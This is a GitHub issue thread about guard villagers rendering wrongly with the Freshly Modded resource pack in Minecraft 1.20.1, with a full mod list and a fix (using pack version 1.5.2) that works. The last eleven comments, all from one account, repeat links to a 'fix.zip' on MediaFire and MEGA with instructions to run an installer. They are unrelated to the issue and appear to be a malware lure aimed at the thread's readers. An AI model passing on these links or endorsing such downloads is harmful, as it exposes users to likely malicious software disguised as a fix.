### ISSUE TITLE
Guard Villagers not rendering correctly

### ISSUE THREAD

**Issue by Lumegrin** [SebSemos/F.M.R.P-Freshly-Modded-#3]
![image](https://github.com/user-attachments/assets/70218386-cb54-4a2e-aa8e-4cf694ab6dfa)
Minecraft 1.20.1
EMF 2.0.2
ETF 6.1.3
Indium 1.0.34

I'm also using Friends and Foes, which works properly. The problem persists even with all resource packs removed besides this pack and Fresh Animations (and Moonlight lib stuff)

Full mods list: 
	- advanced_runtime_resource_pack 0.8.1
	- amendments 1.20-1.2.8
	   \-- mixinextras 0.3.6
	- architectury 9.2.14
	- artifacts 9.5.12
	   |-- cardinal-components-base 5.2.2
	   |-- cardinal-components-entity 5.2.2
	   |-- expandability 9.0.4
	   \-- step-height-entity-attribute 1.2.0
	- azurelib 2.0.31
	- balm-fabric 7.3.7
	   \-- kuma_api 20.1.8
	- bellsandwhistles 0.4.5
	- bettercombat 1.8.6+1.20.1
	- betterdeserttemples 1.20-Fabric-3.0.3
	   \-- org_reflections_reflections 0.10.2
	- betterendisland 1.20-Fabric-2.0.6
	- betterfortresses 1.20-Fabric-2.0.6
	- betterjungletemples 1.20-Fabric-2.0.5
	- bettermineshafts 1.20-Fabric-4.0.4
	- betteroceanmonuments 1.20-Fabric-3.0.4
	- betterpingdisplay 1.1.1
	- betterthirdperson 1.9.0
	- betterwitchhuts 1.20-Fabric-3.0.3
	- bigcontraptions 1.0
	- biomeswevegone 1.1.0-Beta
	- birds-boids 1.1.0
	- boids 1.2.2
	   \-- blue_endless_jankson 1.2.3
	- cafesbirding 1.0-1.20.1
	- cardinal-components 5.2.2
	   |-- cardinal-components-block 5.2.2
	   |-- cardinal-components-chunk 5.2.2
	   |-- cardinal-components-item 5.2.2
	   |-- cardinal-components-level 5.2.2
	   |-- cardinal-components-scoreboard 5.2.2
	   \-- cardinal-components-world 5.2.2
	- chefsdelight 1.0.3-fabric-1.20.1
	- cicada 0.8.3+1.20.1
	- cloth-config 11.1.118
	   \-- cloth-basic-math 0.6.1
	- collective 7.84
	- corgilib 4.0.2.0
	   |-- com_electronwill_night-config_core 3.8.0
	   \-- com_electronwill_night-config_toml 3.8.0
	- create 0.5.1-f-build.1417+mc1.20.1
	   |-- com_google_code_findbugs_jsr305 3.0.2
	   |-- flywheel 0.6.10-2
	   |-- milk 1.2.60
	   |    \-- dripstone_fluid_lib 3.0.2
	   |-- porting_lib_brewing 2.3.2+1.20.1
	   |-- porting_lib_models 2.3.2+1.20.1
	   |    \-- porting_lib_model_loader 2.3.2+1.20.1
	   |-- porting_lib_obj_loader 2.3.2+1.20.1
	   |    \-- porting_lib_model_loader 2.3.2+1.20.1
	   |-- porting_lib_tags 3.0
	   |-- reach-entity-attributes 2.4.0
	   \-- registrate-fabric 1.3.62-MC1.20.1
	        |-- porting_lib_data 2.1.1090+1.20
	        \-- porting_lib_model_generators 2.1.1090+1.20
	             \-- porting_lib_model_materials 2.1.1090+1.20
	- create_aquatic_ambitions 1.1.2+1.20.1
	- create_cards 1.2
	- create_enchantment_industry 1.2.16
	   \-- create_dragon_lib 1.4.2
	- create_interactive 1.0.3-beta.2+e045de2a48
	- create_pattern_schematics 1.1.10
	- create_structures 1.1.0
	- create_train_perspective 0.6.1+mc1.20.1
	- create_trims 1.0.0
	- create_vibrant_vaults 0.2.0+1.20.1
	- createbigcannons 5.5.1+mc.1.20.1-fabric
	   \-- ritchiesprojectilelib 2.0.0-dev+mc.1.20.1-fabric-build.182
	        \-- porting_lib_utility 2.1.1127+1.20
	             \-- porting_lib_gametest 2.1.1127+1.20
	- createdeco 2.0.2-1.20.1-fabric
	- createdynlight 1.0.0
	- createfood 1.1.0
	- creategoggles 0.5.5.g
	- createmetalwork 1.0.6
	- creeperoverhaul 3.0.2
	- crystal_clear 0.0
	- ctov 3.4.6
	- delightfulcreators 1.3-1.20.x
	- do_a_barrel_roll 3.6.1+1.20.1
	- doubledoors 5.9
	- durabilitytooltip 1.1.5
	- dynamic_fps 3.6.3
	   \-- net_lostluma_battery 1.1.0
	- dynamiccrosshair 7.4.4+1.20
	   \-- yaclx 1.12+1.20.2
	- dynamiccrosshaircompat 3.7.5+1.20.1
	- elytratrims 3.4.4
	   |-- conditional-mixin 0.6.2
	   \-- mixinsquared 0.1.2-beta.4
	- emi 1.1.12+1.20.1+fabric
	- emi_loot 0.6.6+1.20.1
	- emitrades 1.2.1+mc1.20.1
	   \-- org_quiltmc_parsers_json 0.2.1
	- endermanoverhaul 1.0.4
	- endrem 5.2.4
	- ends_delight 2.1
	   \-- porting_lib_config 2.3.4+1.20.1
	        \-- porting_lib_core 2.3.4+1.20.1
	- enhancedbrewery 1.0-1.20.1
	- entity_model_features 2.0.2
	- entity_texture_features 6.1.3
	   \-- org_apache_httpcomponents_httpmime 4.5.10
	- entityculling 1.6.6
	- essential-container 1.0.0
	   \-- essential-loader 1.2.3
	- euphoria_patcher 0.3.4-fabric
	   \-- io_sigpipe_jbsdiff 1.0
	- evenbetterarcheology 2.0.0-beta.6
	   \-- sakuralib 1.5.3
	- explosiveenhancement 1.2.2-1.20.x
	- exposure 1.7.6
	- exposure_catalog 1.0.3
	   \-- fabric-permissions-api-v0 0.3.1
	- extra-mod-integrations 0.4.6+1.20.1
	- fabric-api 0.92.2+1.20.1
	   |-- fabric-api-base 0.4.31+1802ada577
	   |-- fabric-api-lookup-api-v1 1.6.36+1802ada577
	   |-- fabric-biome-api-v1 13.0.13+1802ada577
	   |-- fabric-block-api-v1 1.0.11+1802ada577
	   |-- fabric-block-view-api-v2 1.0.1+1802ada577
	   |-- fabric-blockrenderlayer-v1 1.1.41+1802ada577
	   |-- fabric-client-tags-api-v1 1.1.2+1802ada577
	   |-- fabric-command-api-v1 1.2.34+f71b366f77
	   |-- fabric-command-api-v2 2.2.13+1802ada577
	   |-- fabric-commands-v0 0.2.51+df3654b377
	   |-- fabric-containers-v0 0.1.64+df3654b377
	   |-- fabric-content-registries-v0 4.0.11+1802ada577
	   |-- fabric-convention-tags-v1 1.5.5+1802ada577
	   |-- fabric-crash-report-info-v1 0.2.19+1802ada577
	   |-- fabric-data-attachment-api-v1 1.0.0+de0fd6d177
	   |-- fabric-data-generation-api-v1 12.3.4+1802ada577
	   |-- fabric-dimensions-v1 2.1.54+1802ada577
	   |-- fabric-entity-events-v1 1.6.0+1c78457f77
	   |-- fabric-events-interaction-v0 0.6.2+1802ada577
	   |-- fabric-events-lifecycle-v0 0.2.63+df3654b377
	   |-- fabric-game-rule-api-v1 1.0.40+1802ada577
	   |-- fabric-item-api-v1 2.1.28+1802ada577
	   |-- fabric-item-group-api-v1 4.0.12+1802ada577
	   |-- fabric-key-binding-api-v1 1.0.37+1802ada577
	   |-- fabric-keybindings-v0 0.2.35+df3654b377
	   |-- fabric-lifecycle-events-v1 2.2.22+1802ada577
	   |-- fabric-loot-api-v2 1.2.1+1802ada577
	   |-- fabric-loot-tables-v1 1.1.45+9e7660c677
	   |-- fabric-message-api-v1 5.1.9+1802ada577
	   |-- fabric-mining-level-api-v1 2.1.50+1802ada577
	   |-- fabric-model-loading-api-v1 1.0.3+1802ada577
	   |-- fabric-models-v0 0.4.2+9386d8a777
	   |-- fabric-networking-api-v1 1.3.11+1802ada577
	   |-- fabric-networking-v0 0.3.51+df3654b377
	   |-- fabric-object-builder-api-v1 11.1.3+1802ada577
	   |-- fabric-particles-v1 1.1.2+1802ada577
	   |-- fabric-recipe-api-v1 1.0.21+1802ada577
	   |-- fabric-registry-sync-v0 2.3.3+1802ada577
	   |-- fabric-renderer-api-v1 3.2.1+1802ada577
	   |-- fabric-renderer-indigo 1.5.2+85287f9f77
	   |-- fabric-renderer-registries-v1 3.2.46+df3654b377
	   |-- fabric-rendering-data-attachment-v1 0.3.37+92a0d36777
	   |-- fabric-rendering-fluids-v1 3.0.28+1802ada577
	   |-- fabric-rendering-v0 1.1.49+df3654b377
	   |-- fabric-rendering-v1 3.0.8+1802ada577
	   |-- fabric-resource-conditions-api-v1 2.3.8+1802ada577
	   |-- fabric-resource-loader-v0 0.11.10+1802ada577
	   |-- fabric-screen-api-v1 2.0.8+1802ada577
	   |-- fabric-screen-handler-api-v1 1.3.30+1802ada577
	   |-- fabric-sound-api-v1 1.0.13+1802ada577
	   |-- fabric-transfer-api-v1 3.3.5+8dd72ea377
	   \-- fabric-transitive-access-wideners-v1 4.3.1+1802ada577
	- fabric-language-kotlin 1.12.0+kotlin.2.0.10
	   |-- org_jetbrains_kotlin_kotlin-reflect 2.0.10
	   |-- org_jetbrains_kotlin_kotlin-stdlib 2.0.10
	   |-- org_jetbrains_kotlin_kotlin-stdlib-jdk7 2.0.10
	   |-- org_jetbrains_kotlin_kotlin-stdlib-jdk8 2.0.10
	   |-- org_jetbrains_kotlinx_atomicfu-jvm 0.25.0
	   |-- org_jetbrains_kotlinx_kotlinx-coroutines-core-jvm 1.8.1
	   |-- org_jetbrains_kotlinx_kotlinx-coroutines-jdk8 1.8.1
	   |-- org_jetbrains_kotlinx_kotlinx-datetime-jvm 0.6.0
	   |-- org_jetbrains_kotlinx_kotlinx-io-bytestring-jvm 0.5.1
	   |-- org_jetbrains_kotlinx_kotlinx-io-core-jvm 0.5.1
	   |-- org_jetbrains_kotlinx_kotlinx-serialization-cbor-jvm 1.7.1
	   |-- org_jetbrains_kotlinx_kotlinx-serialization-core-jvm 1.7.1
	   \-- org_jetbrains_kotlinx_kotlinx-serialization-json-jvm 1.7.1
	- fabricloader 0.15.11
	- farmersdelight 1.20.1-2.1.2+refabricated
	   |-- mm 2.3
	   |-- porting_lib_accessors 2.3.4+1.20.1
	   |    \-- porting_lib_core 2.3.4+1.20.1
	   |-- porting_lib_base 2.3.4+1.20.1
	   |    |-- porting_lib_attributes 2.3.4+1.20.1
	   |    |-- porting_lib_common 2.3.4+1.20.1
	   |    |-- porting_lib_core 2.3.4+1.20.1
	   |    |-- porting_lib_entity 2.3.4+1.20.1
	   |    |-- porting_lib_fluids 2.3.4+1.20.1
	   |    |-- porting_lib_mixin_extensions 2.3.4+1.20.1
	   |    |-- porting_lib_transfer 2.3.4+1.20.1
	   |    \-- reach-entity-attributes 2.4.0
	   |-- porting_lib_client_events 2.3.4+1.20.1
	   |    \-- porting_lib_core 2.3.4+1.20.1
	   |-- porting_lib_config 2.3.4+1.20.1
	   |    \-- porting_lib_core 2.3.4+1.20.1
	   |-- porting_lib_extensions 2.3.4+1.20.1
	   |    |-- porting_lib_attributes 2.3.4+1.20.1
	   |    |-- porting_lib_common 2.3.4+1.20.1
	   |    |-- porting_lib_core 2.3.4+1.20.1
	   |    \-- reach-entity-attributes 2.4.0
	   |-- porting_lib_lazy_registration 2.3.4+1.20.1
	   |    \-- porting_lib_core 2.3.4+1.20.1
	   |-- porting_lib_loot 2.3.4+1.20.1
	   |    \-- porting_lib_core 2.3.4+1.20.1
	   |-- porting_lib_networking 2.3.4+1.20.1
	   |    \-- porting_lib_core 2.3.4+1.20.1
	   |-- porting_lib_recipe_book_categories 2.3.4+1.20.1
	   |    \-- porting_lib_core 2.3.4+1.20.1
	   |-- porting_lib_registries 2.3.4+1.20.1
	   |    \-- porting_lib_core 2.3.4+1.20.1
	   \-- porting_lib_tool_actions 2.3.4+1.20.1
	        \-- porting_lib_core 2.3.4+1.20.1
	- farmersknives 3.2
	- ferritecore 6.0.1
	- forgeconfigapiport 8.0.0
	- friendsandfoes 2.0.16
	   \-- mixinextras 0.3.6
	- geckolib 4.4.7
	   \-- com_eliotlash_mclib_mclib 20
	- geophilic 3.1.1
	- guardvillagers 2.0.9-1.20.1
	- illagerinvasion 8.0.5
	   \-- extensibleenums 7.0.1
	- immediatelyfast 1.2.20+1.20.4
	   \-- net_lenni0451_reflect 1.3.4
	- immersive_weathering 1.20.1-2.0.1
	- immersiveui 0.2.1
	- indium 1.0.34+mc1.20.1
	- integrated_api 1.5.1+1.20.1-fabric
	- integrated_stronghold 1.1.1+1.20.1-fabric
	- integrated_villages 1.0.1+1.20.1-fabric
	- interiors 0.5.3+fabric-mc1.20.1
	- iris 1.7.2+mc1.20.1
	   |-- fabric-api-base 0.4.31+1802ada577
	   |-- fabric-key-binding-api-v1 1.0.37+1802ada577
	   |-- io_github_douira_glsl-transformer 2.0.1
	   |-- org_anarres_jcpp 1.4.14
	   \-- org_antlr_antlr4-runtime 4.13.1
	- java 17
	- konkrete 1.8.1
	- krypton 0.2.3
	   \-- com_velocitypowered_velocity-native 3.2.0-SNAPSHOT
	- lambdynlights 2.3.2+1.20.1
	   |-- pride 1.2.0+1.19.4
	   \-- spruceui 5.0.0+1.20
	- lazydfu 0.1.3
	- leahs-immersive-thunder 1.20.1+1.2.2
	- legacies_and_legends 1.3.8
	- lithium 0.11.2
	- lithostitched 1.1.8
	- memoryleakfix 1.1.5
	- midnightlib 1.4.1
	- minecart-turning 1.1.0+1.20-1.21
	- minecraft 1.20.1
	- modernfix 5.19.1+mc1.20.1
	- modmenu 7.2.2
	- moonlight 1.20-2.12.12
	- morechathistory 1.3.0
	- mr_blooming_biosphere 1.1.0
	- mr_create_decoadditions 1.3
	- mr_ctov_bygcompat 2.0
	- mr_ctov_chefsdelightcompat 2.0
	- mr_ctov_createstructures 1.0
	- mr_ctov_farmersdelightcompat 2.1
	- mr_ctov_friendsandfoescompat 2.0
	- mr_dungeons_andtavernsancientcityoverhaul 1
	- mr_dungeons_andtavernspillageroutpostrework 1.1
	- mr_dungeons_andtavernsswamphutrework 1
	- mr_hybrid_beta 1.0.3
	- mru 0.4.5+1.20.1
	- naturalist 4.0.3
	- nerb 0.3
	- netherportalfix 13.0.1
	- nethersdelight 1.20.1-4.1.1
	- nochatreports 1.20.1-v2.2.2
	- notenoughanimations 1.7.4
	- notenoughcrashes 4.4.7+1.20.1
	- nyfsspiders 2.1.1
	- ohthetreesyoullgrow 1.20.1-1.3.0
	- owo 0.11.2+1.20
	- player-animator 1.0.2-rc1+1.20
	- pumpkin_pie 1.0.1
	- puzzleslib 8.1.21
	   \-- puzzlesaccessapi 8.0.7
	- railways 1.6.4+fabric-mc1.20.1
	   \-- mm 2.3
	- reeses-sodium-options 1.7.2+mc1.20.1-build.101
	- regions_unexplored 0.5.6+1.20.1
	- resourcefulconfig 2.1.2
	- resourcefullib 2.1.28
	   |-- com_teamresourceful_bytecodecs 1.0.2
	   \-- com_teamresourceful_yabn 1.0.3
	- ribbits 1.20.1-Fabric-3.0.0
	- rolling_down_in_the_deep 0.1.1
	- skinlayers3d 1.6.6
	- sliceanddice 3.2.3
	- smarterfarmers 1.20-1.8.2
	- smoothswapping 0.9.3.1
	- sodium 0.5.11+mc1.20.1
	   |-- fabric-api-base 0.4.31+1802ada577
	   |-- fabric-block-view-api-v2 1.0.1+1802ada577
	   |-- fabric-rendering-data-attachment-v1 0.3.37+92a0d36777
	   |-- fabric-rendering-fluids-v1 3.0.28+1802ada577
	   \-- fabric-resource-loader-v0 0.11.10+1802ada577
	- sodium-extra 0.5.4+mc1.20.1-build.115
	   |-- caffeineconfig 1.3.0+1.17
	   \-- crowdin-translate 1.4+1.19.3
	- sol_valheim 1.1.1
	- sounds 1.1.5+1.20.1
	- starlight 1.1.2+fabric.dbc156f
	- stoneholm 2.0.0
	- supermartijn642configlib 1.1.8+a
	- supplementaries 1.20-2.8.17
	   \-- mixinextras 0.3.6
	- terrablender 3.0.1.7
	- tooltipfix 1.1.1-1.20
	- travelersbackpack fabric-1.20.1-9.1.16
	   \-- reach-entity-attributes 2.4.0
	- trinkets 3.7.2
	- valkyrienskies 2.3.0-beta.5
	- variantsandventures 1.0.5
	   \-- mixinextras 0.3.6
	- vcinteraction 1.20.1-1.0.6
	   \-- polymer-registry-sync-manipulator 0.5.0+1.20
	- villager-hats 1.6.2+1.20
	- villagesandpillages 1.0.1
	- voicechat 1.20.1-2.5.20
	- waterdripsound 1.19-0.3.2
	- yet_another_config_lib_v3 3.5.0+1.20.1-fabric
	   |-- com_twelvemonkeys_common_common-image 3.10.0
	   |-- com_twelvemonkeys_common_common-io 3.10.0
	   |-- com_twelvemonkeys_common_common-lang 3.10.0
	   |-- com_twelvemonkeys_imageio_imageio-core 3.10.0
	   |-- com_twelvemonkeys_imageio_imageio-metadata 3.10.0
	   |-- com_twelvemonkeys_imageio_imageio-webp 3.10.0
	   \-- org_quiltmc_parsers_gson 0.2.1
	- yungsapi 1.20-Fabric-4.0.5
	   \-- org_javassist_javassist 3.29.2-GA
	- yungsbridges 1.20-Fabric-4.0.3
	- zoomify 2.14.0+1.20.1
	   \-- com_akuleshov7_ktoml-core-jvm 0.5.1

**Comment by SebSemos** [comment]
can you try with 1.5.2 of my pack ?
https://modrinth.com/resourcepack/freshly-modded/version/1.5.2

I think you have an update of my pack where guard villagers have been changed, But I didn't realised guardvillagers mod wasn't updated on 1.20.1 for that matter.
I'll keep that in mind for next update

**Comment by Lumegrin** [comment]
It worked, thank you! 
While I'm here, might I suggest changing the Modrinth name to Freshly Modded rather than F.M.R.P.? Freshly Modded is a solid name, and also easier to search than having the name be an acronym
Anyways thanks so much 👍👍👍

**Comment by SebSemos** [comment]
👍

I can try to edit the name, but not sure it'll work. I remember the page beiing denied because of moded in the title when I set it up.... I like Freshly Modded way better too :(

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
